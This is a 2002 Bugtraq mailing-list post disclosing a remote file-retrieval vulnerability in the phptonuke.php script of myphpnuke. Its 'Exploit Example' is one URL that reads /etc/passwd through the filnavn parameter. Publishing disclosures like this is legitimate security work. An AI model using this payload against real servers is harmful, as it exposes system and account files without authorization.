[27462] in bugtraq
phptonuke allows Remote File Retrieving
daemon@ATHENA.MIT.EDU (Zero-X ScriptKiddy)
Wed Oct 16 18:37:01 2002
Message-ID: <20021016215010.17992.qmail@linuxmail.org>
Content-Type: text/plain; charset="iso-8859-15"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
From: "Zero-X ScriptKiddy" <zero-x@linuxmail.org>
To: bugtraq@securityfocus.com
Date: Thu, 17 Oct 2002 05:50:10 +0800
The file "phptonuke.php" from myphpnuke allows Remote File Retrieving.
Exploit Example:
http://website.com/phptonuke.php?filnavn=/etc/passwd
Zero X, member of www.Lobnan.de
--
Get your free email from www.linuxmail.org
Powered by Outblaze